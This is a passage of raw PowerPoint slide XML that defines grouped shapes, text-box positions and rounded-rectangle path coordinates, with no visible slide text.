                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9549C6D5-DD3A-AF16-4F17-48B56CF65640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35EE19BC-443C-1904-304A-8D03E04AF2D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="1181102"/>
            <a:ext cx="20078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BD922B18-775D-0AA1-9A7B-9B699A905BE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="2009955"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="2079498"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="object 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D916114A-FF3D-EC09-E346-F2A429B27273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00763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9" name="object 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DDC86D-98EF-4196-4BB8-50D2450E7EAC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8" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AD99248-A14C-1A51-D490-5909275C3D84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="2095298"/>
            <a:ext cx="17030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35" dirty="0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9" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37111172-4719-A8A4-7082-F4D4F6AB24E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="2924355"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="2993898"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="66" name="object 12">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD2A6596-0368-9137-832B-C5425AB982DE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7" name="object 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1277EAE8-B1CE-B50D-0448-741599D213D4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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E74E0E31-EE09-C2FC-DA68-7F173B6CD130}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="3008378"/>
            <a:ext cx="15392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1" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B4897F8-C114-D6A4-1A8F-CA091E422294}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="561696" y="3837231"/>
            <a:ext cx="2543810" cy="815340"/>
            <a:chOff x="540258" y="3906774"/>
            <a:chExt cx="2543810" cy="815340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="object 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87BD8CC4-0DF9-9A26-86CC-4E41353E94B7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8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6928" y="92940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399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92940" y="808411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1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536628" y="722399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40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450620" y="6928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5" name="object 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3445B2F5-17D7-D222-59FD-44AD59801A36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40"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="92940" y="6928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8"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="26220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="55637"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2536628" y="92940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399"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2517339" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2487923" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2450620" y="808411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1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55637" y="789119"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26220" y="759702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6928" y="722399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2" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D41C6CC-E1B9-DBE9-00B6-B11BA1C7FFD4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="717702" y="3922524"/>
            <a:ext cx="16414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3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3" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36204A6C-CB29-DE47-6104-F10C8E4467F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6264503" y="1247954"/>
            <a:ext cx="864235" cy="774700"/>
            <a:chOff x="6243065" y="1317497"/>
            <a:chExt cx="864235" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="object 20">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{804D0252-DA9C-D96E-FFD7-504D826B1571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735076" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="10142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3" name="object 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CC84154-C270-C338-EA0D-423AABBC01BD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2"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076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4" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7B89BB9-3C96-4D7C-2C60-7D2E709CCBCC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6404077" y="1492379"/>
            <a:ext cx="554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23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BD7F30D-CA90-6E73-F877-A59144AE4B8F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6994499" y="1247954"/>
            <a:ext cx="1056640" cy="774700"/>
            <a:chOff x="6973061" y="1317497"/>
            <a:chExt cx="1056640" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="object 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB7EBEF-4D50-BE36-74C0-814A0A11EF47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927100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927100" y="774191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="10142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1" name="object 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97B19874-9647-3C7F-1436-5CBFC90A5493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927100" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="10142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="37798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="78813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="129031"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1056132" y="645159"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1045989" y="695378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018333" y="736393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977318" y="764049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927100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6" name="object 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AACE5646-4E21-4622-6591-85C909DD1D38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7136740" y="1492379"/>
            <a:ext cx="5918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27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{930245C8-3633-E6F5-E39F-843ED3D9B1D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5568035" y="2087679"/>
            <a:ext cx="864235" cy="772795"/>
            <a:chOff x="5546597" y="2157222"/>
            <a:chExt cx="864235" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="object 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{263F2061-AC43-767A-388D-078A5234AD36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7" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826388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9" name="object 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0047A6A6-01F3-FE48-7F69-3C658E8E7347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8" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864107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8" name="object 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB2AE2AD-7B6D-F94E-1540-FDCC1958183E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5706339" y="2332027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31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E31C031-625F-A372-3F83-A05A04442AC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6296508" y="2087679"/>
            <a:ext cx="1754505" cy="772795"/>
            <a:chOff x="6275070" y="2157222"/>
            <a:chExt cx="1754505" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="object 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9B46A32-A894-A9D7-E611-3C87604C3164}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6275070" y="2157222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4">
                  <a:moveTo>
                    <a:pt x="1625346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1625346" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625346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7" name="object 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B12C593-BFCB-7BA0-70F6-A08E35D7FA44}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6275070" y="2157222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1625346" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1754124" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1744003" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1716404" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1675471" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1625346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0" name="object 34">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23388D2A-A66B-9277-A04B-51D86304EED7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6450940" y="2332027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35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D90146E1-9EDC-2B6E-8C52-7AE631B4B7CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4824323" y="2925879"/>
            <a:ext cx="864235" cy="772795"/>
            <a:chOff x="4802885" y="2995422"/>
            <a:chExt cx="864235" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="54" name="object 36">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31097384-C1AC-E9F9-0F4F-77A829B011D8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4802885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9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9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8" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826389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5" name="object 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72A9CA16-E9A0-D947-6E77-44DB4DD44AD8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4802885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9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9" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853987" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108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9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2" name="object 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97A7B603-0380-A611-2BD6-CD955C5BD3BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4963516" y="3170608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39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB49EDB2-F590-4672-9C5C-0101116ED7F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5554320" y="2925878"/>
            <a:ext cx="2496820" cy="772795"/>
            <a:chOff x="5532882" y="2995421"/>
            <a:chExt cx="2496820" cy="772795"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="object 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D604FFB3-0936-40BE-3897-D8A65DCA9357}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5532882" y="2995421"/>
              <a:ext cx="2496820" cy="772795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2496820" h="772795">
                  <a:moveTo>
                    <a:pt x="2367534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2367534" y="772667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417659" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458592" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486191" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496312" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496312" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486191" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458592" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417659" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367534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3" name="object 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EED12F53-6126-E09E-1012-B7074C2D5E73}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5532882" y="2995421"/>
              <a:ext cx="2496820" cy="772795"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2496820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2367534" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417659" y="10120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458592" y="37718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486191" y="78652"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496312" y="128777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2496312" y="643889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2486191" y="694015"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2458592" y="734948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2417659" y="762547"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2367534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4" name="object 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63141A29-0A49-777B-DBA8-95F0C4956588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5720435" y="3170608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43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01599A34-29CC-6903-E6D6-8CBB70C258CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4033367" y="3828086"/>
            <a:ext cx="864235" cy="774700"/>
            <a:chOff x="4011929" y="3897629"/>
            <a:chExt cx="864235" cy="774700"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="object 44">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C93D33B8-F45F-B104-0CBC-42EFFF954FDB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4011929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0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10142" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37798" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78813" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129032" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="735076" y="774192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="764051"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="736398"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="695383"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="645160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="129032"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="853965" y="78808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="826309" y="37793"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="785294" y="10140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730D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1" name="object 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2416A657-AD17-3DF8-808B-5AB481C2CFA6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
